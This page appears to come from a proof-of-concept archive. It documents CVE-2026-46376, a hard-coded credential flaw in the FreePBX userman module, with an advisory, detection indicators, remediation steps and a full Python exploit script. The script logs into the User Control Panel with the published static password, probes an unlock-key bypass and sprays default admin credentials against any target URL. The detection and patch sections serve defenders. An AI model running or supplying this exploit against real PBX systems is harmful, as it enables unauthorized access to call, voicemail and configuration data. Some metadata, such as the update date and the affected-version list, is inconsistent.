PoC Archive PoC Archive
Critical CVE-2026-46376 (GHSA-m55x-h47x-v3gx) patched

FreePBX Unauthenticated UCP Access via Hard-Coded Credentials (CVE-2026-46376)

by s0nnyWT (discovery); portbuster1337 (PoC) · 2026-07-05

CVSS 9.1/10
Severity
Critical
CVE
CVE-2026-46376 (GHSA-m55x-h47x-v3gx)
Category
web
Affected product
FreePBX (userman module) — User Control Panel (UCP)
Affected versions
userman ≤ 16.0.44 (FreePBX 16), userman ≤ 17.0.6 (FreePBX 17); fixed in 16.0.45 / 17.0.7
Disclosed
2026-07-05
Patch status
patched

Metadata

FieldValue
Date Added2026-07-05
Last Updated2026-05
Author / Researchers0nnyWT (discovery); portbuster1337 (PoC)
CVE / AdvisoryCVE-2026-46376 (GHSA-m55x-h47x-v3gx)
Categoryweb
SeverityCritical
CVSS Score9.1 (CVSS v4.0)
StatusPoC
Tagsfreepbx, userman, ucp, hard-coded-credentials, cwe-798, unauthenticated-access, voip
RelatedN/A

Affected Target

FieldValue
Software / SystemFreePBX (userman module) — User Control Panel (UCP)
Versions Affecteduserman ≤ 16.0.44 (FreePBX 16), userman ≤ 17.0.6 (FreePBX 17); fixed in 16.0.45 / 17.0.7
Language / PlatformPython 3 (PoC); target is PHP (Userman.class.php)
Authentication RequiredNo
Network Access RequiredYes

Summary

FreePBX’s optional UCP generic template setup feature (available since 2021) creates a system user named FreePBXUCPTemplateCreator with a hard-coded, static password (1a2b3c@fd48jshs03123ld) embedded in Userman.class.php. If an administrator runs this setup and never rotates the password, any unauthenticated attacker on the network can log into the User Control Panel with these fixed credentials. The PoC also probes an unlock-key bypass and common ACP default credentials as secondary checks.


Vulnerability Details

Root Cause

The UCP generic template creation routine hashes a hard-coded literal password with md5() and assigns it to the FreePBXUCPTemplateCreator account instead of generating a random secret per install. The password is identical across every FreePBX deployment that has ever used the template feature and is never rotated unless an admin does so manually.

Attack Vector

  1. Confirm the target FreePBX version falls in the affected range (userman ≤ 16.0.44 / ≤ 17.0.6).
  2. Send POST /ucp/ajax.php with module=User&command=login using username FreePBXUCPTemplateCreator and password 1a2b3c@fd48jshs03123ld.
  3. A {"status":true} response confirms the account exists with the default password and the attacker is now authenticated to UCP.
  4. Optionally attempt the unlock-key bypass (?unlockkey=&templateid=) or common ACP default admin credentials as additional checks.

Impact

Unauthenticated access to the User Control Panel, exposing call/voicemail data, extension configuration, and potentially a pivot point into the broader FreePBX/Asterisk PBX system, depending on UCP’s configured privileges.


Environment / Lab Setup

Target:   FreePBX 16 (userman <= 16.0.44) or FreePBX 17 (userman <= 17.0.6) with UCP generic template setup previously run
Attacker: python3 poc.py <target_url>

Proof of Concept

PoC Script

See poc.py in this folder.

1
2
pip3 install requests
python3 poc.py http://192.168.1.100 --method all

Performs a version pre-flight check, then logs into /ucp/ajax.php with the hard-coded FreePBXUCPTemplateCreator credentials (and optionally tries the unlock-key bypass / default admin creds), reporting whether the target is vulnerable.


Detection & Indicators of Compromise

POST /ucp/ajax.php  module=User&command=login  username=FreePBXUCPTemplateCreator
Response {"status":true} => vulnerable / logged in

Signs of compromise:

  • Successful UCP logins as FreePBXUCPTemplateCreator in FreePBX/UCP access logs
  • Active UCP sessions with no corresponding legitimate administrative action

Remediation

ActionDetail
Primary fixUpdate userman to 16.0.45 (FreePBX 16) or 17.0.7 (FreePBX 17), which randomizes the template-creator password via bin2hex(random_bytes(24))
Interim mitigationManually rotate the FreePBXUCPTemplateCreator password (patching does not retroactively change already-deployed passwords); restrict ACP/UCP access via the FreePBX Firewall module; enable MFA/SAML

References


Notes

Mirrored from https://github.com/portbuster1337/CVE-2026-46376 on 2026-07-05.

poc.py
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
#!/usr/bin/env python3
"""
CVE-2026-46376 - FreePBX Unauthenticated UCP Access via Hard-Coded Credentials

Hard-coded credentials in FreePBX userman module UCP generic template setup allow
unauthenticated attackers to access the User Control Panel (UCP).

CVSS: 9.1 (Critical)
CWE: 798 (Use of Hard-Coded Credentials)
Affected: FreePBX 15.0.42+, userman <= 16.0.44 (FreePBX 16), userman <= 17.0.6 (FreePBX 17)
Fixed in: userman 16.0.45, 17.0.7
"""

import argparse
import re
import sys
import warnings
from urllib.parse import urljoin

import requests

warnings.filterwarnings("ignore", message="Unverified HTTPS request")

USERNAME = "FreePBXUCPTemplateCreator"
PASSWORD = "1a2b3c@fd48jshs03123ld"
DEFAULT_ADMIN_CREDS = [
    ("admin", "admin"),
    ("admin", "password"),
    ("maint", "password"),
    ("ampuser", "amp109"),
]
AFFECTED_VERSIONS = [
    ("15", 42, None, "FreePBX 15.0.42+"),
    ("16", 0, 44, "userman <= 16.0.44"),
    ("17", 0, 6, "userman <= 17.0.6"),
]

GREEN = "\033[0;32m"
RED = "\033[0;31m"
YELLOW = "\033[1;33m"
CYAN = "\033[0;36m"
NC = "\033[0m"


def ok(msg):
    print(f"{GREEN}[+]{NC} {msg}")


def err(msg):
    print(f"{RED}[-]{NC} {msg}")


def warn(msg):
    print(f"{YELLOW}[!]{NC} {msg}")


def section(title):
    print(f"\n{CYAN}{'=' * 44}{NC}")
    print(f"{CYAN}  {title}{NC}")
    print(f"{CYAN}{'=' * 44}{NC}")


def version_in_range(version_str):
    try:
        parts = str(version_str).split(".")
        major, minor = parts[0], parts[1]
        patch = parts[2] if len(parts) > 2 else "0"
    except (IndexError, ValueError):
        return False

    for vmaj, vmin, vpatch, _ in AFFECTED_VERSIONS:
        if major == vmaj:
            if vpatch is None:
                if int(minor) >= vmin:
                    return True
            else:
                if int(minor) < vmin:
                    return True
                if int(minor) == vmin and int(patch) <= vpatch:
                    return True
    return False


def pre_flight(target: str, session: requests.Session) -> dict:
    """Run pre-flight checks to assess target readiness."""
    section("Pre-Flight Checks")
    info = {"reachable": False, "has_ucp": False, "version": None, "in_range": False}

    try:
        r = session.get(target, timeout=10, verify=False)
        info["reachable"] = True
        ok(f"Target is reachable (HTTP {r.status_code})")
    except requests.RequestException as e:
        err(f"Target is unreachable: {e}")
        return info

    try:
        r = session.get(urljoin(target, "/admin/config.php"), timeout=10, verify=False)
        m = re.search(r"FreePBX (\d+\.\d+\.\d+)", r.text)
        if m:
            info["version"] = m.group(1)
            ok(f"FreePBX version: {info['version']}")
            info["in_range"] = version_in_range(info["version"])
            if info["in_range"]:
                ok(f"Version {info['version']} is in the affected range")
            else:
                warn(f"Version {info['version']} may not be in the affected range")
    except requests.RequestException:
        warn("Could not access admin panel")

    try:
        r = session.get(urljoin(target, "/ucp/index.php"), timeout=10, verify=False)
        if "User Control Panel" in r.text:
            info["has_ucp"] = True
            ok("UCP interface is accessible")
    except requests.RequestException:
        warn("Could not access UCP")

    return info


def exploit_ucp_credentials(target: str, session: requests.Session, preflight: dict):
    """Attempt UCP login using the hard-coded credentials."""
    section("Method 1: Hard-Coded UCP Credentials")
    print(f"    Username: {USERNAME}")
    print(f"    Password: {PASSWORD}")

    try:
        r = session.get(urljoin(target, "/ucp/index.php"), timeout=10, verify=False)
        m = re.search(r'name="token" value="([^"]+)"', r.text)
        if not m:
            err("Could not extract CSRF token")
            return False
        token = m.group(1)
        ok(f"Got CSRF token: {token}")
    except requests.RequestException as e:
        err(f"Failed to fetch login page: {e}")
        return False

    try:
        r = session.post(
            urljoin(target, "/ucp/ajax.php"),
            data={
                "token": token,
                "username": USERNAME,
                "password": PASSWORD,
                "email": "",
                "module": "User",
                "command": "login",
            },
            headers={"X-Requested-With": "XMLHttpRequest"},
            timeout=10,
            verify=False,
        )
        try:
            data = r.json()
        except Exception:
            err("Login failed - AJAX endpoint returned non-JSON (wrong version or proxy interference)")
            return False

        if data.get("status") is True:
            ok(f"SUCCESS! Logged in as {USERNAME}")
            return True

        msg = data.get("message", "unknown error")
        err(f"Login failed - {msg}")
        return False
    except requests.RequestException as e:
        err(f"Login request failed: {e}")
        return False


def exploit_unlock_bypass(target: str, session: requests.Session):
    """Attempt UCP unlock key bypass via template query parameters."""
    section("Method 2: UCP Unlock Key Bypass")

    for tid in range(6):
        try:
            r = session.get(
                urljoin(target, f"/ucp/index.php?unlockkey=test&templateid={tid}"),
                timeout=10,
                verify=False,
            )
            # Authenticated UCP shows "logout" links and action buttons
            # while the login form is replaced by dashboard content
            if (
                "logout" in r.text.lower()
                and 'id="frm-login"' not in r.text
                and 'name="token"' not in r.text
                and ('class="main-block"' in r.text or 'data-section=' in r.text or 'widget' in r.text.lower())
            ):
                ok(f"SUCCESS! Unlock key bypass worked with templateid={tid}")
                return True
        except requests.RequestException:
            pass

    err("Unlock key bypass failed")
    return False


def exploit_admin_defaults(target: str, session: requests.Session):
    """Attempt admin panel login with common default credentials."""
    section("Method 3: Admin Panel Default Credentials")

    try:
        r = session.get(urljoin(target, "/admin/config.php"), timeout=10, verify=False)
        token_m = re.search(r'name="token" value="([^"]+)"', r.text)
        token = token_m.group(1) if token_m else ""
    except requests.RequestException:
        token = ""

    for user, pwd in DEFAULT_ADMIN_CREDS:
        try:
            data = {"username": user, "password": pwd}
            if token:
                data["token"] = token
            r = session.post(
                urljoin(target, "/admin/config.php"),
                data=data,
                timeout=10,
                verify=False,
            )
            if r.status_code == 401:
                continue
            body = r.text.lower()
            if "invalid username or password" in body:
                continue
            if "loginform" in body or 'id="loginform"' in body:
                continue
            if "freepbx administration" not in body and "freepbx" not in body:
                continue
            ok(f"SUCCESS! Admin login with {user}:{pwd}")
            return True
        except requests.RequestException:
            pass

    err("No default admin credentials worked")
    return False


def main():
    parser = argparse.ArgumentParser(
        description="CVE-2026-46376 - FreePBX Unauthenticated UCP Access PoC",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=(
            "Hard-coded credentials in FreePBX userman UCP generic template setup.\n"
            "Affects FreePBX 15.0.42+ and unpatched userman on FreePBX 16/17.\n\n"
            "Discovered by s0nnyWT, disclosed May 2026."
        ),
    )
    parser.add_argument("target", help="Target URL (e.g. http://192.168.1.100)")
    parser.add_argument(
        "--no-check", action="store_true", help="Skip version pre-flight check"
    )
    parser.add_argument(
        "--yes", "-y", action="store_true", help="Auto-continue even if version is out of range"
    )
    parser.add_argument("--timeout", type=int, default=15, help="Request timeout in seconds")
    parser.add_argument(
        "--method",
        choices=["creds", "unlock", "admin", "all"],
        default="all",
        help="Which exploit method to run (default: all)",
    )
    args = parser.parse_args()

    target = args.target.rstrip("/")
    session = requests.Session()

    print()
    print(f"{CYAN}{'=' * 44}{NC}")
    print(f"{CYAN}  CVE-2026-46376 PoC - FreePBX UCP Access{NC}")
    print(f"{CYAN}  Target: {target}{NC}")
    print(f"{CYAN}{'=' * 44}{NC}")

    preflight = pre_flight(target, session)

    if not preflight["reachable"]:
        sys.exit(1)

    if not args.no_check and preflight["version"] and not preflight["in_range"]:
        warn("Target version appears outside the affected range — exploitation unlikely")
        if not args.yes:
            confirm = input(f"{YELLOW}[?]{NC} Continue anyway? [y/N] ")
            if confirm.lower() != "y":
                print("Exiting.")
                sys.exit(0)

    section("Exploitation")

    results = {}

    if args.method in ("creds", "all"):
        results["creds"] = exploit_ucp_credentials(target, session, preflight)

    if args.method in ("unlock", "all"):
        results["unlock"] = exploit_unlock_bypass(target, session)

    if args.method in ("admin", "all"):
        results["admin"] = exploit_admin_defaults(target, session)

    section("Summary")

    if any(results.values()):
        print(f"{GREEN}Target is VULNERABLE{NC}")
    else:
        print(f"{RED}Target is NOT vulnerable (or version not in affected range){NC}")

    print(f"\n  {YELLOW}Username:{NC} {USERNAME}")
    print(f"  {YELLOW}Password:{NC} {PASSWORD}")
    print()
    print("  Affected versions:")
    for _, _, _, label in AFFECTED_VERSIONS:
        print(f"    - {label}")
    print("  Fixed in: userman 16.0.45, 17.0.7")


if __name__ == "__main__":
    main()